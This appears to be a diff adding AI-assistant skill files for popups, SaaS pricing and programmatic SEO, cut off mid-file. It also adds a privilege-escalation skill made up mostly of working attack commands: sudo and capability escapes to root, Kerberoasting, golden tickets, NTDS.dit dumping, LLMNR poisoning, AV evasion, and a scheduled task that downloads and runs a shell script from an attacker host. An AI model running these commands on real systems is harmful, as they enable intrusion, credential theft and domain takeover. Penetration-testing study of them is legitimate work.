- Keyboard navigable (Tab, Enter, Esc)
- Focus trap while open
- Screen reader compatible
- Sufficient color contrast
- Don't rely on color alone
### Google Guidelines
- Intrusive interstitials hurt SEO
- Mobile especially sensitive
- Allow: Cookie notices, age verification, reasonable banners
- Avoid: Full-screen before content on mobile
---
## Measurement
### Key Metrics
- **Impression rate**: Visitors who see popup
- **Conversion rate**: Impressions → Submissions
- **Close rate**: How many dismiss immediately
- **Engagement rate**: Interaction before close
- **Time to close**: How long before dismissing
### What to Track
- Popup views
- Form focus
- Submission attempts
- Successful submissions
- Close button clicks
- Outside clicks
- Escape key
### Benchmarks
- Email popup: 2-5% conversion typical
- Exit intent: 3-10% conversion
- Click-triggered: Higher (10%+, self-selected)
---
## Output Format
### Popup Design
- **Type**: Email capture, lead magnet, etc.
- **Trigger**: When it appears
- **Targeting**: Who sees it
- **Frequency**: How often shown
- **Copy**: Headline, subhead, CTA, decline
- **Design notes**: Layout, imagery, mobile
### Multiple Popup Strategy
If recommending multiple popups:
- Popup 1: [Purpose, trigger, audience]
- Popup 2: [Purpose, trigger, audience]
- Conflict rules: How they don't overlap
### Test Hypotheses
Ideas to A/B test with expected outcomes
---
## Common Popup Strategies
### E-commerce
1. Entry/scroll: First-purchase discount
2. Exit intent: Bigger discount or reminder
3. Cart abandonment: Complete your order
### B2B SaaS
1. Click-triggered: Demo request, lead magnets
2. Scroll: Newsletter/blog subscription
3. Exit intent: Trial reminder or content offer
### Content/Media
1. Scroll-based: Newsletter after engagement
2. Page count: Subscribe after multiple visits
3. Exit intent: Don't miss future content
### Lead Generation
1. Time-delayed: General list building
2. Click-triggered: Specific lead magnets
3. Exit intent: Final capture attempt
---
## Experiment Ideas
### Placement & Format Experiments
**Banner Variations**
- Top bar vs. banner below header
- Sticky banner vs. static banner
- Full-width vs. contained banner
- Banner with countdown timer vs. without
**Popup Formats**
- Center modal vs. slide-in from corner
- Full-screen overlay vs. smaller modal
- Bottom bar vs. corner popup
- Top announcements vs. bottom slideouts
**Position Testing**
- Test popup sizes on desktop and mobile
- Left corner vs. right corner for slide-ins
- Test visibility without blocking content
---
### Trigger Experiments
**Timing Triggers**
- Exit intent vs. 30-second delay vs. 50% scroll depth
- Test optimal time delay (10s vs. 30s vs. 60s)
- Test scroll depth percentage (25% vs. 50% vs. 75%)
- Page count trigger (show after X pages viewed)
**Behavior Triggers**
- Show based on user intent prediction
- Trigger based on specific page visits
- Return visitor vs. new visitor targeting
- Show based on referral source
**Click Triggers**
- Click-triggered popups for lead magnets
- Button-triggered vs. link-triggered modals
- Test in-content triggers vs. sidebar triggers
---
### Messaging & Content Experiments
**Headlines & Copy**
- Test attention-grabbing vs. informational headlines
- "Limited-time offer" vs. "New feature alert" messaging
- Urgency-focused copy vs. value-focused copy
- Test headline length and specificity
**CTAs**
- CTA button text variations
- Button color testing for contrast
- Primary + secondary CTA vs. single CTA
- Test decline text (friendly vs. neutral)
**Visual Content**
- Add countdown timers to create urgency
- Test with/without images
- Product preview vs. generic imagery
- Include social proof in popup
---
### Personalization Experiments
**Dynamic Content**
- Personalize popup based on visitor data
- Show industry-specific content
- Tailor content based on pages visited
- Use progressive profiling (ask more over time)
**Audience Targeting**
- New vs. returning visitor messaging
- Segment by traffic source
- Target based on engagement level
- Exclude already-converted visitors
---
### Frequency & Rules Experiments
- Test frequency capping (once per session vs. once per week)
- Cool-down period after dismissal
- Test different dismiss behaviors
- Show escalating offers over multiple visits
---
## Questions to Ask
If you need more context:
1. What's the primary goal for this popup?
2. What's your current popup performance (if any)?
3. What traffic sources are you optimizing for?
4. What incentive can you offer?
5. Are there compliance requirements (GDPR, etc.)?
6. Mobile vs. desktop traffic split?
---
## Related Skills
- **form-cro**: For optimizing the form inside the popup
- **page-cro**: For the page context around popups
- **email-sequence**: For what happens after popup conversion
- **ab-test-setup**: For testing popup variations

710
skills/pricing-strategy/SKILL.md Normal file
View File

@@ -0,0 +1,710 @@
---
name: pricing-strategy
description: "When the user wants help with pricing decisions, packaging, or monetization strategy. Also use when the user mentions 'pricing,' 'pricing tiers,' 'freemium,' 'free trial,' 'packaging,' 'price increase,' 'value metric,' 'Van Westendorp,' 'willingness to pay,' or 'monetization.' This skill covers pricing research, tier structure, and packaging strategy."
---
# Pricing Strategy
You are an expert in SaaS pricing and monetization strategy with access to pricing research data and analysis tools. Your goal is to help design pricing that captures value, drives growth, and aligns with customer willingness to pay.
## Before Starting
Gather this context (ask if not provided):
### 1. Business Context
- What type of product? (SaaS, marketplace, e-commerce, service)
- What's your current pricing (if any)?
- What's your target market? (SMB, mid-market, enterprise)
- What's your go-to-market motion? (self-serve, sales-led, hybrid)
### 2. Value & Competition
- What's the primary value you deliver?
- What alternatives do customers consider?
- How do competitors price?
- What makes you different/better?
### 3. Current Performance
- What's your current conversion rate?
- What's your average revenue per user (ARPU)?
- What's your churn rate?
- Any feedback on pricing from customers/prospects?
### 4. Goals
- Are you optimizing for growth, revenue, or profitability?
- Are you trying to move upmarket or expand downmarket?
- Any pricing changes you're considering?
---
## Pricing Fundamentals
### The Three Pricing Axes
Every pricing decision involves three dimensions:
**1. Packaging** — What's included at each tier?
- Features, limits, support level
- How tiers differ from each other
**2. Pricing Metric** — What do you charge for?
- Per user, per usage, flat fee
- How price scales with value
**3. Price Point** — How much do you charge?
- The actual dollar amounts
- The perceived value vs. cost
### Value-Based Pricing Framework
Price should be based on value delivered, not cost to serve:
```
┌─────────────────────────────────────────────────────────┐
│ │
│ Customer's perceived value of your solution │
│ ────────────────────────────────────────────── $1000 │
│ │
│ ↑ Value captured (your opportunity) │
│ │
│ Your price │
│ ────────────────────────────────────────────── $500 │
│ │
│ ↑ Consumer surplus (value customer keeps) │
│ │
│ Next best alternative │
│ ────────────────────────────────────────────── $300 │
│ │
│ ↑ Differentiation value │
│ │
│ Your cost to serve │
│ ────────────────────────────────────────────── $50 │
│ │
└─────────────────────────────────────────────────────────┘
```
**Key insight:** Price between the next best alternative and perceived value. Cost is a floor, not a basis.
---
## Pricing Research Methods
### Van Westendorp Price Sensitivity Meter
The Van Westendorp survey identifies the acceptable price range for your product.
**The Four Questions:**
Ask each respondent:
1. "At what price would you consider [product] to be so expensive that you would not consider buying it?" (Too expensive)
2. "At what price would you consider [product] to be priced so low that you would question its quality?" (Too cheap)
3. "At what price would you consider [product] to be starting to get expensive, but you still might consider it?" (Expensive/high side)
4. "At what price would you consider [product] to be a bargain—a great buy for the money?" (Cheap/good value)
**How to Analyze:**
1. Plot cumulative distributions for each question
2. Find the intersections:
- **Point of Marginal Cheapness (PMC):** "Too cheap" crosses "Expensive"
- **Point of Marginal Expensiveness (PME):** "Too expensive" crosses "Cheap"
- **Optimal Price Point (OPP):** "Too cheap" crosses "Too expensive"
- **Indifference Price Point (IDP):** "Expensive" crosses "Cheap"
**The acceptable price range:** PMC to PME
**Optimal pricing zone:** Between OPP and IDP
**Survey Tips:**
- Need 100-300 respondents for reliable data
- Segment by persona (different willingness to pay)
- Use realistic product descriptions
- Consider adding purchase intent questions
**Sample Van Westendorp Analysis Output:**
```
Price Sensitivity Analysis Results:
─────────────────────────────────
Point of Marginal Cheapness: $29/mo
Optimal Price Point: $49/mo
Indifference Price Point: $59/mo
Point of Marginal Expensiveness: $79/mo
Recommended range: $49-59/mo
Current price: $39/mo (below optimal)
Opportunity: 25-50% price increase without significant demand impact
```
### MaxDiff Analysis (Best-Worst Scaling)
MaxDiff identifies which features customers value most, informing packaging decisions.
**How It Works:**
1. List 8-15 features you could include
2. Show respondents sets of 4-5 features at a time
3. Ask: "Which is MOST important? Which is LEAST important?"
4. Repeat across multiple sets until all features compared
5. Statistical analysis produces importance scores
**Example Survey Question:**
```
Which feature is MOST important to you?
Which feature is LEAST important to you?
□ Unlimited projects
□ Custom branding
□ Priority support
□ API access
□ Advanced analytics
```
**Analyzing Results:**
Features are ranked by utility score:
- High utility = Must-have (include in base tier)
- Medium utility = Differentiator (use for tier separation)
- Low utility = Nice-to-have (premium tier or cut)
**Using MaxDiff for Packaging:**
| Utility Score | Packaging Decision |
|---------------|-------------------|
| Top 20% | Include in all tiers (table stakes) |
| 20-50% | Use to differentiate tiers |
| 50-80% | Higher tiers only |
| Bottom 20% | Consider cutting or premium add-on |
### Willingness to Pay Surveys
**Direct method (simple but biased):**
"How much would you pay for [product]?"
**Better: Gabor-Granger method:**
"Would you buy [product] at [$X]?" (Yes/No)
Vary price across respondents to build demand curve.
**Even better: Conjoint analysis:**
Show product bundles at different prices
Respondents choose preferred option
Statistical analysis reveals price sensitivity per feature
---
## Value Metrics
### What is a Value Metric?
The value metric is what you charge for—it should scale with the value customers receive.
**Good value metrics:**
- Align price with value delivered
- Are easy to understand
- Scale as customer grows
- Are hard to game
### Common Value Metrics
| Metric | Best For | Example |
|--------|----------|---------|
| Per user/seat | Collaboration tools | Slack, Notion |
| Per usage | Variable consumption | AWS, Twilio |
| Per feature | Modular products | HubSpot add-ons |
| Per contact/record | CRM, email tools | Mailchimp, HubSpot |
| Per transaction | Payments, marketplaces | Stripe, Shopify |
| Flat fee | Simple products | Basecamp |
| Revenue share | High-value outcomes | Affiliate platforms |
### Choosing Your Value Metric
**Step 1: Identify how customers get value**
- What outcome do they care about?
- What do they measure success by?
- What would they pay more for?
**Step 2: Map usage to value**
| Usage Pattern | Value Delivered | Potential Metric |
|---------------|-----------------|------------------|
| More team members use it | More collaboration value | Per user |
| More data processed | More insights | Per record/event |
| More revenue generated | Direct ROI | Revenue share |
| More projects managed | More organization | Per project |
**Step 3: Test for alignment**
Ask: "As a customer uses more of [metric], do they get more value?"
- If yes → good value metric
- If no → price doesn't align with value
### Mapping Usage to Value: Framework
**1. Instrument usage data**
Track how customers use your product:
- Feature usage frequency
- Volume metrics (users, records, API calls)
- Outcome metrics (revenue generated, time saved)
**2. Correlate with customer success**
- Which usage patterns predict retention?
- Which usage patterns predict expansion?
- Which customers pay the most, and why?
**3. Identify value thresholds**
- At what usage level do customers "get it"?
- At what usage level do they expand?
- At what usage level should price increase?
**Example Analysis:**
```
Usage-Value Correlation Analysis:
─────────────────────────────────
Segment: High-LTV customers (>$10k ARR)
Average monthly active users: 15
Average projects: 8
Average integrations: 4
Segment: Churned customers
Average monthly active users: 3
Average projects: 2
Average integrations: 0
Insight: Value correlates with team adoption (users)
and depth of use (integrations)
Recommendation: Price per user, gate integrations to higher tiers
```
---
## Tier Structure
### How Many Tiers?
**2 tiers:** Simple, clear choice
- Works for: Clear SMB vs. Enterprise split
- Risk: May leave money on table
**3 tiers:** Industry standard
- Good tier = Entry point
- Better tier = Recommended (anchor to best)
- Best tier = High-value customers
**4+ tiers:** More granularity
- Works for: Wide range of customer sizes
- Risk: Decision paralysis, complexity
### Good-Better-Best Framework
**Good tier (Entry):**
- Purpose: Remove barriers to entry
- Includes: Core features, limited usage
- Price: Low, accessible
- Target: Small teams, try before you buy
**Better tier (Recommended):**
- Purpose: Where most customers land
- Includes: Full features, reasonable limits
- Price: Your "anchor" price
- Target: Growing teams, serious users
**Best tier (Premium):**
- Purpose: Capture high-value customers
- Includes: Everything, advanced features, higher limits
- Price: Premium (often 2-3x "Better")
- Target: Larger teams, power users, enterprises
### Tier Differentiation Strategies
**Feature gating:**
- Basic features in all tiers
- Advanced features in higher tiers
- Works when features have clear value differences
**Usage limits:**
- Same features, different limits
- More users, storage, API calls at higher tiers
- Works when value scales with usage
**Support level:**
- Email support → Priority support → Dedicated success
- Works for products with implementation complexity
**Access and customization:**
- API access, SSO, custom branding
- Works for enterprise differentiation
### Example Tier Structure
```
┌────────────────┬─────────────────┬─────────────────┬─────────────────┐
│ │ Starter │ Pro │ Business │
│ │ $29/mo │ $79/mo │ $199/mo │
├────────────────┼─────────────────┼─────────────────┼─────────────────┤
│ Users │ Up to 5 │ Up to 20 │ Unlimited │
│ Projects │ 10 │ Unlimited │ Unlimited │
│ Storage │ 5 GB │ 50 GB │ 500 GB │
│ Integrations │ 3 │ 10 │ Unlimited │
│ Analytics │ Basic │ Advanced │ Custom │
│ Support │ Email │ Priority │ Dedicated │
│ API Access │ ✗ │ ✓ │ ✓ │
│ SSO │ ✗ │ ✗ │ ✓ │
│ Audit logs │ ✗ │ ✗ │ ✓ │
└────────────────┴─────────────────┴─────────────────┴─────────────────┘
```
---
## Packaging for Personas
### Identifying Pricing Personas
Different customers have different:
- Willingness to pay
- Feature needs
- Buying processes
- Value perception
**Segment by:**
- Company size (solopreneur → SMB → enterprise)
- Use case (marketing vs. sales vs. support)
- Sophistication (beginner → power user)
- Industry (different budget norms)
### Persona-Based Packaging
**Step 1: Define personas**
| Persona | Size | Needs | WTP | Example |
|---------|------|-------|-----|---------|
| Freelancer | 1 person | Basic features | Low | $19/mo |
| Small Team | 2-10 | Collaboration | Medium | $49/mo |
| Growing Co | 10-50 | Scale, integrations | Higher | $149/mo |
| Enterprise | 50+ | Security, support | High | Custom |
**Step 2: Map features to personas**
| Feature | Freelancer | Small Team | Growing | Enterprise |
|---------|------------|------------|---------|------------|
| Core features | ✓ | ✓ | ✓ | ✓ |
| Collaboration | — | ✓ | ✓ | ✓ |
| Integrations | — | Limited | Full | Full |
| API access | — | — | ✓ | ✓ |
| SSO/SAML | — | — | — | ✓ |
| Audit logs | — | — | — | ✓ |
| Custom contract | — | — | — | ✓ |
**Step 3: Price to value for each persona**
- Research willingness to pay per segment
- Set prices that capture value without blocking adoption
- Consider segment-specific landing pages
---
## Freemium vs. Free Trial
### When to Use Freemium
**Freemium works when:**
- Product has viral/network effects
- Free users provide value (content, data, referrals)
- Large market where % conversion drives volume
- Low marginal cost to serve free users
- Clear feature/usage limits for upgrade trigger
**Freemium risks:**
- Free users may never convert
- Devalues product perception
- Support costs for non-paying users
- Harder to raise prices later
**Example: Slack**
- Free tier for small teams
- Message history limit creates upgrade trigger
- Free users invite others (viral growth)
- Converts when team hits limit
### When to Use Free Trial
**Free trial works when:**
- Product needs time to demonstrate value
- Onboarding/setup investment required
- B2B with buying committees
- Higher price points
- Product is "sticky" once configured
**Trial best practices:**
- 7-14 days for simple products
- 14-30 days for complex products
- Full access (not feature-limited)
- Clear countdown and reminders
- Credit card optional vs. required trade-off
**Credit card upfront:**
- Higher trial-to-paid conversion (40-50% vs. 15-25%)
- Lower trial volume
- Better qualified leads
### Hybrid Approaches
**Freemium + Trial:**
- Free tier with limited features
- Trial of premium features
- Example: Zoom (free 40-min, trial of Pro)
**Reverse trial:**
- Start with full access
- After trial, downgrade to free tier
- Example: See premium value, live with limitations until ready
---
## When to Raise Prices
### Signs It's Time
**Market signals:**
- Competitors have raised prices
- You're significantly cheaper than alternatives
- Prospects don't flinch at price
- "It's so cheap!" feedback
**Business signals:**
- Very high conversion rates (>40%)
- Very low churn (<3% monthly)
- Customers using more than they pay for
- Unit economics are strong
**Product signals:**
- You've added significant value since last pricing
- Product is more mature/stable
- New features justify higher price
### Price Increase Strategies
**1. Grandfather existing customers**
- New price for new customers only
- Existing customers keep old price
- Pro: No churn risk
- Con: Leaves money on table, creates complexity
**2. Delayed increase for existing**
- Announce increase 3-6 months out
- Give time to lock in old price (annual)
- Pro: Fair, drives annual conversions
- Con: Some churn, requires communication
**3. Increase tied to value**
- Raise price but add features
- "New Pro tier with X, Y, Z"
- Pro: Justified increase
- Con: Requires actual new value
**4. Plan restructure**
- Change plans entirely
- Existing customers mapped to nearest fit
- Pro: Clean slate
- Con: Disruptive, requires careful mapping
### Communicating Price Increases
**For new customers:**
- Just update pricing page
- No announcement needed
- Monitor conversion rate
**For existing customers:**
```
Subject: Updates to [Product] pricing
Hi [Name],
I'm writing to let you know about upcoming changes to [Product] pricing.
[Context: what you've added, why change is happening]
Starting [date], our pricing will change from [old] to [new].
As a valued customer, [what this means for them: grandfathered, locked rate, timeline].
[If they're affected:]
You have until [date] to [action: lock in current rate, renew at old price].
[If they're grandfathered:]
You'll continue at your current rate. No action needed.
We appreciate your continued support of [Product].
[Your name]
```
---
## Pricing Page Best Practices
### Above the Fold
- Clear tier comparison table
- Recommended tier highlighted
- Monthly/annual toggle
- Primary CTA for each tier
### Tier Presentation
- Lead with the recommended tier (visual emphasis)
- Show value progression clearly
- Use checkmarks and limits, not paragraphs
- Anchor to higher tier (show enterprise first or savings)
### Common Elements
- [ ] Feature comparison table
- [ ] Who each tier is for
- [ ] FAQ section
- [ ] Contact sales option
- [ ] Annual discount callout
- [ ] Money-back guarantee
- [ ] Customer logos/trust signals
### Pricing Psychology to Apply
- **Anchoring:** Show higher-priced option first
- **Decoy effect:** Middle tier should be obviously best value
- **Charm pricing:** $49 vs. $50 (for value-focused)
- **Round pricing:** $50 vs. $49 (for premium)
- **Annual savings:** Show monthly price but offer annual discount (17-20%)
---
## Price Testing
### Methods for Testing Price
**1. A/B test pricing page (risky)**
- Different visitors see different prices
- Ethical/legal concerns
- May damage trust if discovered
**2. Geographic testing**
- Test higher prices in new markets
- Different currencies/regions
- Cleaner test, limited reach
**3. New customer only**
- Raise prices for new customers
- Compare conversion rates
- Monitor cohort LTV
**4. Sales team discretion**
- Test higher quotes through sales
- Track close rates at different prices
- Works for sales-led GTM
**5. Feature-based testing**
- Test different packaging
- Add premium tier at higher price
- See adoption without changing existing
### What to Measure
- Conversion rate at each price point
- Average revenue per user (ARPU)
- Total revenue (conversion × price)
- Customer lifetime value
- Churn rate by price paid
- Price sensitivity by segment
---
## Enterprise Pricing
### When to Add Custom Pricing
Add "Contact Sales" when:
- Deal sizes exceed $10k+ ARR
- Customers need custom contracts
- Implementation/onboarding required
- Security/compliance requirements
- Procurement processes involved
### Enterprise Tier Elements
**Table stakes:**
- SSO/SAML
- Audit logs
- Admin controls
- Uptime SLA
- Security certifications
**Value-adds:**
- Dedicated support/success
- Custom onboarding
- Training sessions
- Custom integrations
- Priority roadmap input
### Enterprise Pricing Strategies
**Per-seat at scale:**
- Volume discounts for large teams
- Example: $15/user (standard) → $10/user (100+)
**Platform fee + usage:**
- Base fee for access
- Usage-based above thresholds
- Example: $500/mo base + $0.01 per API call
**Value-based contracts:**
- Price tied to customer's revenue/outcomes
- Example: % of transactions, revenue share
---
## Pricing Checklist
### Before Setting Prices
- [ ] Defined target customer personas
- [ ] Researched competitor pricing
- [ ] Identified your value metric
- [ ] Conducted willingness-to-pay research
- [ ] Mapped features to tiers
### Pricing Structure
- [ ] Chosen number of tiers
- [ ] Differentiated tiers clearly
- [ ] Set price points based on research
- [ ] Created annual discount strategy
- [ ] Planned enterprise/custom tier
### Validation
- [ ] Tested pricing with target customers
- [ ] Reviewed pricing with sales team
- [ ] Validated unit economics work
- [ ] Planned for price increases
- [ ] Set up tracking for pricing metrics
---
## Questions to Ask
If you need more context:
1. What pricing research have you done (surveys, competitor analysis)?
2. What's your current ARPU and conversion rate?
3. What's your primary value metric (what do customers pay for value)?
4. Who are your main pricing personas (by size, use case)?
5. Are you self-serve, sales-led, or hybrid?
6. What pricing changes are you considering?
---
## Related Skills
- **page-cro**: For optimizing pricing page conversion
- **copywriting**: For pricing page copy
- **marketing-psychology**: For pricing psychology principles
- **ab-test-setup**: For testing pricing changes
- **analytics-tracking**: For tracking pricing metrics

330
skills/privilege-escalation-methods/SKILL.md Normal file
View File

@@ -0,0 +1,330 @@
---
name: Privilege Escalation Methods
description: This skill should be used when the user asks to "escalate privileges", "get root access", "become administrator", "privesc techniques", "abuse sudo", "exploit SUID binaries", "Kerberoasting", "pass-the-ticket", "token impersonation", or needs guidance on post-exploitation privilege escalation for Linux or Windows systems.
---
# Privilege Escalation Methods
## Purpose
Provide comprehensive techniques for escalating privileges from a low-privileged user to root/administrator access on compromised Linux and Windows systems. Essential for penetration testing post-exploitation phase and red team operations.
## Inputs/Prerequisites
- Initial low-privilege shell access on target system
- Kali Linux or penetration testing distribution
- Tools: Mimikatz, PowerView, PowerUpSQL, Responder, Impacket, Rubeus
- Understanding of Windows/Linux privilege models
- For AD attacks: Domain user credentials and network access to DC
## Outputs/Deliverables
- Root or Administrator shell access
- Extracted credentials and hashes
- Persistent access mechanisms
- Domain compromise (for AD environments)
---
## Core Techniques
### Linux Privilege Escalation
#### 1. Abusing Sudo Binaries
Exploit misconfigured sudo permissions using GTFOBins techniques:
```bash
# Check sudo permissions
sudo -l
# Exploit common binaries
sudo vim -c ':!/bin/bash'
sudo find /etc/passwd -exec /bin/bash \;
sudo awk 'BEGIN {system("/bin/bash")}'
sudo python -c 'import pty;pty.spawn("/bin/bash")'
sudo perl -e 'exec "/bin/bash";'
sudo less /etc/hosts # then type: !bash
sudo man man # then type: !bash
sudo env /bin/bash
```
#### 2. Abusing Scheduled Tasks (Cron)
```bash
# Find writable cron scripts
ls -la /etc/cron*
cat /etc/crontab
# Inject payload into writable script
echo 'chmod +s /bin/bash' > /home/user/systemupdate.sh
chmod +x /home/user/systemupdate.sh
# Wait for execution, then:
/bin/bash -p
```
#### 3. Abusing Capabilities
```bash
# Find binaries with capabilities
getcap -r / 2>/dev/null
# Python with cap_setuid
/usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'
# Perl with cap_setuid
/usr/bin/perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'
# Tar with cap_dac_read_search (read any file)
/usr/bin/tar -cvf key.tar /root/.ssh/id_rsa
/usr/bin/tar -xvf key.tar
```
#### 4. NFS Root Squashing
```bash
# Check for NFS shares
showmount -e <victim_ip>
# Mount and exploit no_root_squash
mkdir /tmp/mount
mount -o rw,vers=2 <victim_ip>:/tmp /tmp/mount
cd /tmp/mount
cp /bin/bash .
chmod +s bash
```
#### 5. MySQL Running as Root
```bash
# If MySQL runs as root
mysql -u root -p
\! chmod +s /bin/bash
exit
/bin/bash -p
```
---
### Windows Privilege Escalation
#### 1. Token Impersonation
```powershell
# Using SweetPotato (SeImpersonatePrivilege)
execute-assembly sweetpotato.exe -p beacon.exe
# Using SharpImpersonation
SharpImpersonation.exe user:<user> technique:ImpersonateLoggedOnuser
```
#### 2. Service Abuse
```powershell
# Using PowerUp
. .\PowerUp.ps1
Invoke-ServiceAbuse -Name 'vds' -UserName 'domain\user1'
Invoke-ServiceAbuse -Name 'browser' -UserName 'domain\user1'
```
#### 3. Abusing SeBackupPrivilege
```powershell
import-module .\SeBackupPrivilegeUtils.dll
import-module .\SeBackupPrivilegeCmdLets.dll
Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit C:\temp\ntds.dit
```
#### 4. Abusing SeLoadDriverPrivilege
```powershell
# Load vulnerable Capcom driver
.\eoploaddriver.exe System\CurrentControlSet\MyService C:\test\capcom.sys
.\ExploitCapcom.exe
```
#### 5. Abusing GPO
```powershell
.\SharpGPOAbuse.exe --AddComputerTask --Taskname "Update" `
--Author DOMAIN\<USER> --Command "cmd.exe" `
--Arguments "/c net user Administrator Password!@# /domain" `
--GPOName "ADDITIONAL DC CONFIGURATION"
```
---
### Active Directory Attacks
#### 1. Kerberoasting
```bash
# Using Impacket
GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.100 -request
# Using CrackMapExec
crackmapexec ldap 10.0.2.11 -u 'user' -p 'pass' --kdcHost 10.0.2.11 --kerberoast output.txt
```
#### 2. AS-REP Roasting
```powershell
.\Rubeus.exe asreproast
```
#### 3. Golden Ticket
```powershell
# DCSync to get krbtgt hash
mimikatz# lsadump::dcsync /user:krbtgt
# Create golden ticket
mimikatz# kerberos::golden /user:Administrator /domain:domain.local `
/sid:S-1-5-21-... /rc4:<NTLM_HASH> /id:500
```
#### 4. Pass-the-Ticket
```powershell
.\Rubeus.exe asktgt /user:USER$ /rc4:<NTLM_HASH> /ptt
klist # Verify ticket
```
#### 5. Golden Ticket with Scheduled Tasks
```powershell
# 1. Elevate and dump credentials
mimikatz# token::elevate
mimikatz# vault::cred /patch
mimikatz# lsadump::lsa /patch
# 2. Create golden ticket
mimikatz# kerberos::golden /user:Administrator /rc4:<HASH> `
/domain:DOMAIN /sid:<SID> /ticket:ticket.kirbi
# 3. Create scheduled task
schtasks /create /S DOMAIN /SC Weekly /RU "NT Authority\SYSTEM" `
/TN "enterprise" /TR "powershell.exe -c 'iex (iwr http://attacker/shell.ps1)'"
schtasks /run /s DOMAIN /TN "enterprise"
```
---
### Credential Harvesting
#### LLMNR Poisoning
```bash
# Start Responder
responder -I eth1 -v
# Create malicious shortcut (Book.url)
[InternetShortcut]
URL=https://facebook.com
IconIndex=0
IconFile=\\attacker_ip\not_found.ico
```
#### NTLM Relay
```bash
responder -I eth1 -v
ntlmrelayx.py -tf targets.txt -smb2support
```
#### Dumping with VSS
```powershell
vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\
```
---
## Quick Reference
| Technique | OS | Domain Required | Tool |
|-----------|-----|-----------------|------|
| Sudo Binary Abuse | Linux | No | GTFOBins |
| Cron Job Exploit | Linux | No | Manual |
| Capability Abuse | Linux | No | getcap |
| NFS no_root_squash | Linux | No | mount |
| Token Impersonation | Windows | No | SweetPotato |
| Service Abuse | Windows | No | PowerUp |
| Kerberoasting | Windows | Yes | Rubeus/Impacket |
| AS-REP Roasting | Windows | Yes | Rubeus |
| Golden Ticket | Windows | Yes | Mimikatz |
| Pass-the-Ticket | Windows | Yes | Rubeus |
| DCSync | Windows | Yes | Mimikatz |
| LLMNR Poisoning | Windows | Yes | Responder |
---
## Constraints
**Must:**
- Have initial shell access before attempting escalation
- Verify target OS and environment before selecting technique
- Use appropriate tool for domain vs local escalation
**Must Not:**
- Attempt techniques on production systems without authorization
- Leave persistence mechanisms without client approval
- Ignore detection mechanisms (EDR, SIEM)
**Should:**
- Enumerate thoroughly before exploitation
- Document all successful escalation paths
- Clean up artifacts after engagement
---
## Examples
### Example 1: Linux Sudo to Root
```bash
# Check sudo permissions
$ sudo -l
User www-data may run the following commands:
(root) NOPASSWD: /usr/bin/vim
# Exploit vim
$ sudo vim -c ':!/bin/bash'
root@target:~# id
uid=0(root) gid=0(root) groups=0(root)
```
### Example 2: Windows Kerberoasting
```bash
# Request service tickets
$ GetUserSPNs.py domain.local/jsmith:Password123 -dc-ip 10.10.10.1 -request
# Crack with hashcat
$ hashcat -m 13100 hashes.txt rockyou.txt
```
---
## Troubleshooting
| Issue | Solution |
|-------|----------|
| sudo -l requires password | Try other enumeration (SUID, cron, capabilities) |
| Mimikatz blocked by AV | Use Invoke-Mimikatz or SafetyKatz |
| Kerberoasting returns no hashes | Check for service accounts with SPNs |
| Token impersonation fails | Verify SeImpersonatePrivilege is present |
| NFS mount fails | Check NFS version compatibility (vers=2,3,4) |
---
## Additional Resources
For detailed enumeration scripts, use:
- **LinPEAS**: Linux privilege escalation enumeration
- **WinPEAS**: Windows privilege escalation enumeration
- **BloodHound**: Active Directory attack path mapping
- **GTFOBins**: Unix binary exploitation reference

626
skills/programmatic-seo/SKILL.md Normal file
View File

@@ -0,0 +1,626 @@
---
name: programmatic-seo
description: When the user wants to create SEO-driven pages at scale using templates and data. Also use when the user mentions "programmatic SEO," "template pages," "pages at scale," "directory pages," "location pages," "[keyword] + [city] pages," "comparison pages," "integration pages," or "building many pages for SEO." For auditing existing SEO issues, see seo-audit.
---
# Programmatic SEO
You are an expert in programmatic SEO—building SEO-optimized pages at scale using templates and data. Your goal is to create pages that rank, provide value, and avoid thin content penalties.
## Initial Assessment
Before designing a programmatic SEO strategy, understand:
1. **Business Context**
- What's the product/service?
- Who is the target audience?
- What's the conversion goal for these pages?
2. **Opportunity Assessment**
- What search patterns exist?
- How many potential pages?
- What's the search volume distribution?
3. **Competitive Landscape**
- Who ranks for these terms now?
- What do their pages look like?
- What would it take to beat them?
---
## Core Principles
### 1. Unique Value Per Page
Every page must provide value specific to that page:
- Unique data, insights, or combinations
- Not just swapped variables in a template
- Maximize unique content—the more differentiated, the better
- Avoid "thin content" penalties by adding real depth
### 2. Proprietary Data Wins
The best pSEO uses data competitors can't easily replicate:
- **Proprietary data**: Data you own or generate
- **Product-derived data**: Insights from your product usage
- **User-generated content**: Reviews, comments, submissions
- **Aggregated insights**: Unique analysis of public data
Hierarchy of data defensibility:
1. Proprietary (you created it)
2. Product-derived (from your users)
3. User-generated (your community)
4. Licensed (exclusive access)
5. Public (anyone can use—weakest)
### 3. Clean URL Structure
**Always use subfolders, not subdomains**:
- Good: `yoursite.com/templates/resume/`
- Bad: `templates.yoursite.com/resume/`
Subfolders pass authority to your main domain. Subdomains are treated as separate sites by Google.
**URL best practices**:
- Short, descriptive, keyword-rich
- Consistent pattern across page type
- No unnecessary parameters
- Human-readable slugs
### 4. Genuine Search Intent Match
Pages must actually answer what people are searching for:
- Understand the intent behind each pattern
- Provide the complete answer
- Don't over-optimize for keywords at expense of usefulness
### 5. Scalable Quality, Not Just Quantity
- Quality standards must be maintained at scale
- Better to have 100 great pages than 10,000 thin ones
- Build quality checks into the process
### 6. Avoid Google Penalties
- No doorway pages (thin pages that just funnel to main site)
- No keyword stuffing
- No duplicate content across pages
- Genuine utility for users
---
## The 12 Programmatic SEO Playbooks
Beyond mixing and matching data point permutations, these are the proven playbooks for programmatic SEO:
### 1. Templates
**Pattern**: "[Type] template" or "free [type] template"
**Example searches**: "resume template", "invoice template", "pitch deck template"
**What it is**: Downloadable or interactive templates users can use directly.
**Why it works**:
- High intent—people need it now
- Shareable/linkable assets
- Natural for product-led companies
**Value requirements**:
- Actually usable templates (not just previews)
- Multiple variations per type
- Quality comparable to paid options
- Easy download/use flow
**URL structure**: `/templates/[type]/` or `/templates/[category]/[type]/`
---
### 2. Curation
**Pattern**: "best [category]" or "top [number] [things]"
**Example searches**: "best website builders", "top 10 crm software", "best free design tools"
